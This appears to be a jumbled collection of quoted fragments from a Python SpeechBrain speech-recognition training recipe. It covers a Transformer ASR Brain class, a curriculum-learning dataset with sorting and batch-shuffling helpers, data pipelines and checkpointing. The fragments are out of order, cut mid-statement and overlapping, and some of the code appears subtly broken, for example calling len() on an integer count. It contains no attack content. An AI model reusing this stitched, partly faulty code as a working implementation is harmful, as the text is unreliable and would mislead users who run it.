FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={},", "sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id] = index return weights", "2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2021 \"\"\" import os", "Comparing logic, as `ordering_info` can contain multiple keys Note: Value and its meaning", "all epochs are run. jit_module_keys (list of str) List of keys in ``modules``", "= float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and value < min_value) or", "<= limit: continue return False for key, func in key_test.items(): if bool(func(computed[key])): continue", "mode, Default ``2``. If a non-positive number is passed, all epochs are run.", "sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at end-of-epoch", "stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss,", "multiprocess logic, like splitting the training data into subsets for each device and", "min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling", "is ddp, this will generally handle multiprocess logic, like splitting the training data", "self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss =", "sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats)", "to handle , whether the dataset needs to be reshuffled at the end", "computed[key] <= limit: continue return False for key, func in key_test.items(): if bool(func(computed[key])):", "sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]", "of str) List of keys in ``modules`` that should be jit compiled. distributed_count", "! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\": #", "key, else return the result if res == 0: continue else: return res", "self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos,", "to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"],", "training if interrupted if self.checkpointer is not None: # do not reload the", "\"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], },", "self.sortagrad < epoch: # recreate dataset using random shuffling return else: return def", "with this value. Default: ``5``. nonfinite_patience (int) Number of times to ignore non-finite", "i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point)", "The possible sorting is applied, but only on the first n data points", "rather than the full one), and many other possible variations. Authors * <NAME>", "The following methods are used and expected to have a certain behavior: *", "will be passed all modules in ``modules`` at the beginning of the ``fit()``", "self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc,", "if data_point[key] <= limit key_test : dict Map from key (in data or", "this recipe, do the following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml", "etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"],", "= index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for", "= self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer", "return False for key, limit in key_max_value.items(): if computed[key] <= limit: continue return", "to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount of time", "self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the right optimizer on the", "checkpoint on the main process. Arguments --------- epoch_counter : iterable Each call should", "target_words) # compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return", "These will be accessible via an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x).", "sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True,", "is None batch_selection : str Information on how to order batches. - Possible", "tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens", "stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps =", "check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if", "the datasets to be used in the brain class. It also defines the", "if bool(func(data_point[key])) == True min_weight : None, int If not None, will only", "\"\"\"Checks if the data example has weight within the range (`min_value`, `max_value`)\"\"\" if", "\"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time = time.time() #", "None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint", "+= 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) #", "shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids):", "'': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ):", "if res == 0: continue else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids)", "enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare", "_output_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on output length\"\"\"", "# cnt = 0 # for batch in t: # # print(batch.duration) #", "min_weight max_weight : None, int If not None, will only keep data_point if", "it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for order in orderings: if order.strip()", "% valid_search_interval == 0 or ( stage == sb.Stage.TEST ): # Decode token", "\"\"\"Gets called at the end of a epoch.\"\"\" # Compute/store important stats stage_stats", "<= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr", "not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID,", "import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time def", "valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for csv_file in", "* loss_seq ) if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval", "end of the evaluation stage # delete the rest of the intermediate checkpoints", "jit compiled. distributed_count (int) Number of devices to run on. distributed_backend (str) One", "tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage", "is set to 1.1 so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\":", "depending on # # the path given in the YAML file). The tokenizer", "the dynamic items twice. Arguments --------- key_min_value : dict Map from key (in", "# Iterate epochs for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train()", "reload the weights if training is interrupted right before stage 2 group =", "if computed[key] <= limit: continue return False for key, func in key_test.items(): if", "= len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in", "multiple keys Note: Value and its meaning * 1 - key1 > key2", "which iterates epochs and datasets for the purpose of \"fitting\" a set of", "epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve", "valid_loader (if valid_set is a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs", ") # adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter,", "summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) #", "__name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as", "and sorting steps don't need to compute the dynamic items twice. Arguments ---------", "== 0: continue else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids =", "enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for", "of times to ignore non-finite losses before stopping. Default: ``3``. noprogressbar (bool) Whether", "predicted_words, target_words) # compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)", "else: return 0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two data points", "args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs a few epochs if", "data or in dynamic items) to func, will only keep data_point if bool(func(data_point[key]))", "= predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens", "Compute outputs hyps = None if stage == sb.Stage.TRAIN: hyps = None elif", "(or elsewhere depending on # # the path given in the YAML file).", "in dataset_orderings: key = ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\" else", "= ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\" else -1 if key", "count. train_set : Dataset, DataLoader A set of data to use for training.", "return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as", "behavior can be changed by overriding the ``configure_optimizers()`` method. hparams : dict Each", "func, will only keep data_point if bool(func(data_point[key])) == True min_weight : None, int", "= self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output", "data_point[key] <= limit key_test : dict Map from key (in data or in", "hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and", "elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\")", "be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder},", "FilteredSortedDynamicItemDataset Shares the static data, but has its own output keys and dynamic", "h). The best model is the average of the checkpoints from last 5", "np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index]", "ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device )", "# dynamic_ncols=True, # disable=False, # ) as t: # cnt = 0 #", "different encoders, decoders, tokens (e.g, characters instead of BPE), training split (e.g, train-clean", "to divide the dataset into batches. This helps in ordering the dataset at", "weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def", "= self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: # for the sake of", "Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq,", "[hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set", "# noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu", "asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) #", "time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled", "train_set = make_dataloader( # valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] #", "has takes only the list of parameters (e.g. a lambda or partial function", "curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad =", "to ensure code runs without crashing. debug_batches (int) Number of batches to run", "> self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched", "compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss ,", ": dict Kwargs passed to `make_dataloader()` for making the train_loader (if train_set is", "_reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at batch level\"\"\" data_ids", "level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id data_count =", "# ) # with tqdm( # train_set, # initial=0, # dynamic_ncols=True, # disable=False,", "self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at end-of-epoch if stage == sb.Stage.VALID", "ACC is set to 1.1 so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only(", "epochs for which curriculum must be used is defined if self.sortagrad < epoch:", "experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation", "1.1 so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch},", "used directly. valid_set : Dataset, DataLoader A set of data to use for", "tie is broken using ``output_length`` in descending order Note: This is used only", "batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos", "as we need it to encode the labels when creating # mini-batches. tokenizer", "one of random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\":", "For a simple use case (e.g., training a single model with a single", "devices to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device", "from key (in data or in dynamic items) to limit, will only keep", "current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps", "[ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self,", "have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization", "epoch): \"\"\"Gets called at the end of a epoch.\"\"\" # Compute/store important stats", "epoch) # Only run validation \"on_stage_end\" on main process self.step = 0 run_on_main(", "these batches randomly to create final dataset batch_size : 8, int Used to", "else: return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data points", "checkpoint at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch", "Debug mode only runs a few epochs if self.debug and epoch == self.debug_epochs:", "existence of multiple functions that can (or should) be overridden. The following methods", "in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ):", "should consist of a string key and a hyperparameter that is used within", "! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\":", "and dynamic items (initially deep copied from this, so they have the same", "sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval", "+ [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4.", "created. If a DataLoader is given, it is used directly. valid_set : Dataset,", "for making the train_loader (if train_set is a Dataset, not DataLoader). E.G. batch_size,", "ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This", "self.update_average( loss, avg_valid_loss ) # Debug mode only runs a few batches if", "if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter,", "return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset", "training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched =", "| set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id", "a single model with a single dataset) the only methods that need to", "def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules,", "temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with", "== 0 or ( stage == sb.Stage.TEST ): # Decode token terms to", "{ \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats,", "not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set =", "\"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device)", "these two methods is done. For more complicated use cases, such as multiple", "batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos,", "elif length1 < length2: return -1 else: return 0 def _alphabetic_comparator( self, key1,", "self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST ):", "Dataset is given, a DataLoader is automatically created. If a DataLoader is given,", "self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar =", "! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\":", "duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif duration1 < duration2:", "__init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class,", "and datasets to improve objective. Relies on the existence of multiple functions that", "self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights,", "To run this recipe, do the following: > python train.py hparams/transformer.yaml > python", "False for key, func in key_test.items(): if bool(func(computed[key])): continue return False return True", "Use curriculum learning for ``n`` number of epochs By default, it is ``-1``.", "== \"ascending\": # # we sort training data to speed up training and", "should be jit compiled. distributed_count (int) Number of devices to run on. distributed_backend", "Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data,", "filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list", "same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams,", "\"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens,", "hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) #", "class is the implementation of the ``fit()`` method, which iterates epochs and datasets", "details of data loops. The primary purpose of the `Brain` class is the", "sort_key=\"duration\", reverse=True # ) # # when sorting do not shuffle in dataloader", "can try different encoders, decoders, tokens (e.g, characters instead of BPE), training split", "epochs are run. jit_module_keys (list of str) List of keys in ``modules`` that", "= None elif stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if", "self.modules.train() # Reset nonfinite count to 0 each epoch self.nonfinite_count = 0 if", "elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type", "info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must", "Beamsearch coupled with a Transformer language model is used on the top of", "key_max_value, key_test) # order entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids)", "batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning", "filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example", "return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids", "): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time = time.time() # Only", "input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0", "batch in t: self.step += 1 global_step = completed_steps + self.step loss, loss_ctc,", "data. In order to use the ``fit()`` method, one should sub-class the ``Brain``", "== 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats", "weight, these weight(s) will be used to sort the dataset. ordering_info : str", "iterate a few batches for all datasets, to ensure code runs without crashing.", "= self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: # Create dataset", "self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids,", "directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main(", "try different encoders, decoders, tokens (e.g, characters instead of BPE), training split (e.g,", "order , tie is broken using ``output_length`` in descending order Note: This is", "= self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps", "r\"\"\"Brain class abstracts away the details of data loops. The primary purpose of", "self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights =", "self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must be one of", "set of data to use for validation. If a Dataset is given, a", "< max_weight weights : None, dict Map from data_id to weight, these weight(s)", "changing the parameter files, you can try different encoders, decoders, tokens (e.g, characters", "DataLoader kwargs are all valid. progressbar : bool Whether to display the progress", "\"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of", "is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain =", "sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\")", "None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0", "to change the runtime environment, including debug (bool) If ``True``, this will only", "key1, key2 ): \"\"\"Compare two data points based on output length\"\"\" length1 =", "same dynamic items available) \"\"\" # ordering type can be random, sorted #", "True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = []", "= self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval", "into subsets for each device and only saving a checkpoint on the main", "batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) ==", "= {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights(", "# Debug mode only runs a few batches if self.debug and self.step ==", "batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens,", "specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted(", "data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if", "train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"]", "): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None", "debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its own output", "its own output keys and dynamic items (initially deep copied from this, so", "audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline:", "# train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv(", "is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the right", "# hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\": # pass # else:", "beamsearch with limited capacity # and no LM to give user some idea", "wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the", "self, key1, key2 ): \"\"\"Compare two data points based on output length\"\"\" length1", "else: lr = self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = {", "= self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load", "for keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example:", "[train_data, valid_data] + [i for k, i in test_datasets.items()] # We get the", "need to switch optimizer # if so change the optimizer from Adam to", "return else: if self.sortagrad != -1: # number of epochs for which curriculum", "`ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain multiple keys Note:", "dataset at batch level. select_n : None, int If not None, only keep", "inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard", "for batch in t: # # print(batch.duration) # # print(batch.wrd) # # if", "stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage,", "2020 * <NAME> 2020 * <NAME> 2021 \"\"\" import os import torch from", "select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ]", ") loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc", "input and creates a dictionary out of it\"\"\" ordering_info = [] orderings =", "): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at end-of-epoch if", "index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings", "for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches( self, weights=None,", "class and override any methods for which the default behavior does not match", "not shuffle in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False #", "Information to create weights based on pre-defined keys( and/or methods) and their order.", "below illustrates how overriding these two methods is done. For more complicated use", "tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain", "in debug mode, Default ``2``. debug_epochs (int) Number of epochs to run in", "None, only keep (at most) the first n filtered data_points. The possible sorting", "loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of each epoch\"\"\"", "loss_seq ) if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if", "= self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1 optimizer", "t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step)", "train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting do", "create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage):", "* ``-1`` - Use curriculum learning for all epochs * ``n`` - Use", "of batches to run in debug mode, Default ``2``. debug_epochs (int) Number of", "training data into subsets for each device and only saving a checkpoint on", 